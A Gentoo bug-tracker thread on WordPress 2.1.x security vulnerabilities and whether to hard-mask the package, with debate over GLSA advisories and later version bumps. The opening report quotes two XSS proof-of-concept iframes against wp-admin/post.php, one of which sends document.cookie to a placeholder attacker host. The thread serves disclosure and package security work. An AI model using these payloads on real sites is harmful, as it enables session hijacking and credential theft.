Exploit: Cookie in an Alert Box: <iframe width=600 height=400 src='http://example.com/wp-admin/post.php?action=delete&post=%27%3E%3Csc ript%3Ealert(document.cookie)%3C/script%3E%3Clol=%27'></iframe> Cookie send to an Evil Host: <iframe width=600 height=400 src='http://example.com/wp-admin/post.php?action=delete&post=%27%3E%3Csc ript%3Eimage=document.createElement(%27img%27);image.src=%27http://evilh ost.com/datagrabber.php?cookie=%27%2bdocument.cookie;%3C/script%3E%3Clol =%27'></iframe> Reproducible: Didn't try http://www.securityfocus.com/archive/1/461351
the ~arched tree is still vulnerable, please mask the vulnerable ebuild or ~keyword 2.1.1. (Or, both) Should we issue a GLSA? Personnally i tend to think we should issue a GLSA warning our users that wordpress is no longer security-supported (either it's put in p.mask or in ~arch)
i'm pro-mask. i simply can't recommend anyone to use this app - if users want it, then they still can unmask...
Bad days for wordpress. Now, and exploit that was added by a cracker. http://wordpress.org/development/2007/03/upgrade-212/ Does this affect gentoo?
(In reply to comment #3) > Bad days for wordpress. Now, and exploit that was added by a cracker. > http://wordpress.org/development/2007/03/upgrade-212/ > Does this affect gentoo? We've already noticed. Pretty much hard to say, noone upstream bothered to provide the hashes of 'geniune' vs. 'cracked' files. This thing needs to be completely masked and possible just removed from portage; upstream can't be much more lame than this. :X
just found this by coincidence... # Stefan Cornelius <dercorny@gentoo.org> (3 Mar 2007) # Masking wordpress due to a long list of security bugs # e.g. check bug #168529 www-apps/wordpress since it seems to be masked now... do we want a mask glsa?
Does this really need to be hard-masked? A major XSS vunerability (at least the other one reported in bug #168449) is reportedly fixed now in 2.1.2. Also only the 2.1.1 package was tampered with and even that was only vulnerable from between 2007-02-25 and 2007-03-02. Version 2.1.2 has replaced 2.1.1 due to the tampering. Also, I'm sure Wordpress could provide some digests of their "genuine" archive files if asked to guard from future tampering. At the least maybe arch-mask this across the board instead of hard-mask it since the security issues are *well* documented in other locations as well.
some additional, related vulnerabilities: http://www.fadetoblack.ch/advisories/wordpress_2.1.1_multiple_script_injection_vulnerabilities.txt I'll vote for a GLSA - people need to know that Wordpress is no longer going to be supported, it's a popular webapp.
(In reply to comment #7) > some additional, related vulnerabilities: > > http://www.fadetoblack.ch/advisories/wordpress_2.1.1_multiple_script_injection_vulnerabilities.txt > > I'll vote for a GLSA - people need to know that Wordpress is no longer going to > be supported, it's a popular webapp. > i agree. Furthermore, there have been other security issues in the meantime. GLSA request filed
It should be noted that this vulnerability was filed within the date range that the tampered 2.1.1 file was available (2007-2-25 to 2007-3-2). If this is still the case in 2.1.2, then that's fine. Otherwise this shouldn't be grounds for masking 2.1.2 as well. Technically you could probably just outright remove 2.1.1 from the portage tree since it no longer exists as far as a version you can download from the wordpress.org site. As far as 2.1.2 I still think arch mask is more fitting from a user's perspective. Hard mask to me implies either a development version or outright "unstable" behavior. For example, Joe user tries to use a common feature in an everyday kind of way (i.e. not injecting various SQL statements in odd places) and the software breaks something or outright crashes. This seems to be reinforced by the Gentoo Development Guide (http://devmanual.gentoo.org/keywording/): "The package.mask file can be used to 'hard mask' individual or groups of ebuilds. This should be used for testing ebuilds or beta releases of software, and may also be used if a package has serious compatibility problems. Packages which are not hard masked must not have a dependency upon hard masked packages. The only time it is acceptable for a user to see the Possibly a DEPEND problem error message is if they have manually changed visibility levels for a package (for example, through /etc/portage/) and have missed a dependency. You should never commit a change which could cause this error to appear on a user system." ... This is not so much "unstable" as it is "security flawed" and finding such flaws is more indicative of simple arch mask ... not a hard mask as the Development Guide would seem to dictate. Either way a GLSA is a good step, I have no issue there. My only issue is with the level of masking on the 2.1.2 version.
Oops. 2.1.1 is already removed. You can disregard that part of my post.
(In reply to comment #6) > Does this really need to be hard-masked? A major XSS vunerability (at least the > other one reported in bug #168449) is reportedly fixed now in 2.1.2. Also only > the 2.1.1 package was tampered with and even that was only vulnerable from > between 2007-02-25 and 2007-03-02. Version 2.1.2 has replaced 2.1.1 due to the > tampering. > i really don't know why does all that people discovered so many vulnerabilities in wordpress during those last few weeks, see: http://secunia.com/search/?search=wordpress and http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wordpress That's impressive. Wordpress definitely can't be considered as a stable package (arched) nor as a for-stable-testing package (~arched)
*** Bug 168449 has been marked as a duplicate of this bug. ***
(In reply to comment #11) > (In reply to comment #6) > > Does this really need to be hard-masked? A major XSS vunerability (at least the > > other one reported in bug #168449) is reportedly fixed now in 2.1.2. Also only > > the 2.1.1 package was tampered with and even that was only vulnerable from > > between 2007-02-25 and 2007-03-02. Version 2.1.2 has replaced 2.1.1 due to the > > tampering. > > > > > i really don't know why does all that people discovered so many vulnerabilities > in wordpress during those last few weeks, see: > http://secunia.com/search/?search=wordpress > and > http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wordpress > That's impressive. > > Wordpress definitely can't be considered as a stable package (arched) nor as a > for-stable-testing package (~arched) > You can't just look at the number of results just by searching "wordpress", say "Wow, that's a lot. This product must be really unstable", and leave it at that. Many of the vulnerabilities listed are for *much older versions* (i.e. previous to even 2.0). In at least one case on cve.mitre.org, there was a vulnerability that didn't have anything to do with Wordpress itself and yet it showed up in the search because it's just a simple partial text search (for example: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0574 ). Two of the CVE vulnerabilities cite the same sources and are really two symptoms of the same vulnerability ( http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0540 and http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0541 ) and even those are more a problem with the 3rd party pingback function that wordpresss uses rather than wordpress itself (they had a couple issues with their implementation of it on top of the vulnerability but that has been fixed since version 2.1). After looking though any listings that remotely appeared to possibly affect the current version (I think 2.0.9 could probably be dumped from the portage tree at this point) I've come cut the list down to 3 "internal" vulnerabilities and one "external" vulnerability (i.e. the previously mentioned "pingback" vunerability URLs) and even some of the internal vulnerabilities can be corrected by blocking the direct access of certain files through .htaccess. URLs for "current" vulnerabilities: http://secunia.com/advisories/24316/ http://secunia.com/advisories/24430/ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1409 There was also one other "unfixed" vulnerability listed, but it's a pretty trivial one that's only valid for manual brute-force type attacks. It concerns differing error messages for bad user names and bad passwords. It may have been fixed by now (it was reported on version 2.0.5) URL: http://secunia.com/advisories/23621/
too long for my tired eyes, sorry. Perhaps the maintainer will choose to put back it into ~arch lated, we'll see.
(In reply to comment #14) > too long for my tired eyes, sorry. Perhaps the maintainer will choose to put > back it into ~arch lated, we'll see. > Can we please close the security bugs now that it's hard masked? I'm not going to kill the 2.0.x branch since upstream is backporting security patches to it. And I'm not going to unmask it anytime soon since 2.0.5 through 2.0.9 were all security bugfix releases coming out on average two weeks apart each.
The hard mask is: www-apps/wordpress it seems to me that it should have been <www-apps/wordpress-2.1.2 Wordpress is, in general, a good product with an extremely active user community and good upstream maintenance. Additionally, the security problem with 2.1.1 wasn't with Wordpress itself, but the site from which wordpress is distributed. Wordpress is certainly not "unstable". Hard masking all of Wordpress does not seem like a response measured against the actual risk. Please consider changing the mask as above. Thank you.
GLSA 200703-23 Moving to enhancement pending resolution. Steve please comment here if you unmask or remove future versions.
http://wordpress.org/development/2007/04/wordpress-213-and-2010/ Wordpress 2.1.3 and 2.0.10 We have a security update release now available for both the 2.1 and 2.0 branches of WordPress now available for immediate download. This update is highly recommend for all users of both branches. ---------- Lof of people is using wordpress. We should at least update de ebuild although it is being marked as masked.
web-apps what do you say?
For people that don't want to/can't wait much longer, copying the ebuild for 2.1.2 in an overlay and renaming it to wordpress-2.1.3.ebuild works just fine.
(In reply to comment #18) > http://wordpress.org/development/2007/04/wordpress-213-and-2010/ > > Wordpress 2.1.3 and 2.0.10 > > We have a security update release now available for both the 2.1 and 2.0 > branches of WordPress now available for immediate download. This update is > highly recommend for all users of both branches. New ebuilds in CVS
(In reply to comment #21) > New ebuilds in CVS Does this mean it's going to be unmasked?
(In reply to comment #22) > (In reply to comment #21) > > New ebuilds in CVS > > Does this mean it's going to be unmasked? > No. Can we close the bug?
(In reply to comment #23) > (In reply to comment #22) > > (In reply to comment #21) > > > New ebuilds in CVS > > > > Does this mean it's going to be unmasked? > > > > No. > > Can we close the bug? > If you're wanting to close the bug, then why not unmask it??? I mean what's the sense of keeping it masked if 2.1.3 and 2.0.10 are supposed to fix all the XSS issues?
(In reply to comment #24) > (In reply to comment #23) > > (In reply to comment #22) > > > (In reply to comment #21) > > > > New ebuilds in CVS > > > > > > Does this mean it's going to be unmasked? > > > > > > > No. > > > > Can we close the bug? > > > > If you're wanting to close the bug, then why not unmask it??? I mean what's the > sense of keeping it masked if 2.1.3 and 2.0.10 are supposed to fix all the XSS > issues? > Sorry, I like wordpress as much as the next guy, but it has had a poor security track recently, which led us to p.mask it in the first place. If things improve in the future, we'll look at it again, but now's not the time.
(In reply to comment #25) > (In reply to comment #24) > > (In reply to comment #23) > > > (In reply to comment #22) > > > > (In reply to comment #21) > > > > > New ebuilds in CVS > > > > > > > > Does this mean it's going to be unmasked? > > > > > > > > > > No. > > > > > > Can we close the bug? > > > > > > > If you're wanting to close the bug, then why not unmask it??? I mean what's the > > sense of keeping it masked if 2.1.3 and 2.0.10 are supposed to fix all the XSS > > issues? > > > > Sorry, I like wordpress as much as the next guy, but it has had a poor security > track recently, which led us to p.mask it in the first place. > > If things improve in the future, we'll look at it again, but now's not the > time. > I guess it make some sense when you put it that way. As long as there's fair chance for the software to "redeem" itself, then I guess there's not as much of a problem. I'll just have to keep my "www-apps/wordpress" entry in package.unmask for a little while longer :-). I'm just hoping the hard mask doesn't "scare off" some people as much as ... say ... an alpha release of most any Microsoft product ( or beta ... or perhaps even "stable" depending on your point of view )
I know this just creates what I'm actually asking to stop... Can we have this be a bug, and not a forum? Thank you :)
Two weeks ago WordPress released a major security update in 2.2.1. Any chance of changing the hard/whole package mask to a "<www-apps/wordpress-2.2.1" mask? See: http://wordpress.org/support/topic/122939
(In reply to comment #28) > Two weeks ago WordPress released a major security update in 2.2.1. Any chance > of changing the hard/whole package mask to a "<www-apps/wordpress-2.2.1" mask? > > See: http://wordpress.org/support/topic/122939 > My vote for it
(In reply to comment #28) > Two weeks ago WordPress released a major security update in 2.2.1. Any chance > of changing the hard/whole package mask to a "<www-apps/wordpress-2.2.1" mask? > > See: http://wordpress.org/support/topic/122939 > As long as every little new Wordpress release contains security-relevant fixes I'd say: no.
And its that time of the month again :P http://wordpress.org/development/2007/08/wordpress-222-and-2011/ New release including 2 security related fixed (XSS and SQL injection).
(In reply to comment #31) > And its that time of the month again :P > > http://wordpress.org/development/2007/08/wordpress-222-and-2011/ > > New release including 2 security related fixed (XSS and SQL injection). > ... and as usual just copying the ebuild works fine.
(In reply to comment #32) > (In reply to comment #31) > > And its that time of the month again :P > > > > http://wordpress.org/development/2007/08/wordpress-222-and-2011/ > > > > New release including 2 security related fixed (XSS and SQL injection). > > > > ... and as usual just copying the ebuild works fine. > thanks, bumped
Can this bug be closed? If not and it should be kept open as a reference that removal of the hard mask of wordpress might be just temporary then I suggest to modify the topic so that this becomes clear.
This bug should stay open until the mask is removed and we'd likely need to issue a new GLSA at that point. wrobel feel free to change the title if you have one that suits better, I need more coffee here:)
(In reply to comment #35) > This bug should stay open until the mask is removed and we'd likely need to > issue a new GLSA at that point. > > wrobel feel free to change the title if you have one that suits better, I need > more coffee here:) The p.mask is removed for >=2.3, but those are not stable.
Hmmm I guess we'll have to wait until it is stable again (if ever).
In the light of #208980 and the fact that this app had a number of sec issues during the months it has been unmasked the question has come up whether we completely move this app into the webapp-experimental overlay. I don't mind bumping wordpress once in a while but I also don't feel it is too good if we tell our users that this is a usable app. How does security feel about wordpress?
(In reply to comment #38) > In the light of #208980 and the fact that this app had a number of sec issues > during the months it has been unmasked the question has come up whether we > completely move this app into the webapp-experimental overlay. > > I don't mind bumping wordpress once in a while but I also don't feel it is too > good if we tell our users that this is a usable app. > > How does security feel about wordpress? > Like you said, new worpress vulns pop up every month, so IMO it should stay p.masked. The webapp-experimental sounds like a plan.
I don't think it needs to move to an experimental overlay, if it is p.masked.
Okay, hard mask applied again.
Wordpress 2.5 has been released. http://wordpress.org/latest.tar.gz Would appreciate to see it included in portage tree. Thanks!
(In reply to comment #42) > Wordpress 2.5 has been released. http://wordpress.org/latest.tar.gz > Would appreciate to see it included in portage tree. > Thanks! > 2.5.1. in the tree
*** Bug 219912 has been marked as a duplicate of this bug. ***
Is there any other open vulnerabilities? If not, shall we unmask it? Thanks!
2.6 has been released, whats the status of that one?
Added wordpress-2.6. Let's see how this one fares during the next months but I don't really expect less sec bugs.
2.6.1 is out, would love to see it added to the tree.
2.6.2 is out, fixing a SQL column trunctation issue that allows for user password reset.
Another one: #247468 :/
Another one: CVE-2008-5278 Luckily, we've only got 2.6.5 in tree.
How about Wordpress 2.7? Hopefully it will have a better security record :D.
Probably wordpress improved these days and upstream is working on bugs. What about unmasking it? I'm going to do this if nobody objects.
Also CVE-2008-5695. I'm against stabilizing it, as wordpress has as too long security record for my taste. If there are no bugs for three months I might change my mind, though.
(In reply to comment #54) > Also CVE-2008-5695. > I'm against stabilizing it, as wordpress has as too long security record for my > taste. If there are no bugs for three months I might change my mind, though. > There's a difference between unmasking it (like Peter suggested) and stabilizing Wordpress.
3 _months_ for a php app? Not going to happen :). I agree that it should be unmasked. There is probably no reason to stabilize a package like this because changes will be so frequent, however, unless the policy were to be different (i.e. minor releases pushed stable immediately). FWIW in recent times it has been no worse than Drupal or Mediawiki.
Uuuh, why did I read stabilize there? Unmasking might be ok, but I'm against stabling.
(In reply to comment #57) > Uuuh, why did I read stabilize there? > Unmasking might be ok, but I'm against stabling. > I agree.
unmasked. Let's close this bug, noglsa since wordpress is now unstable package.
ok, closing since it's now unmasked. We'll open new bugs as new issues pop up.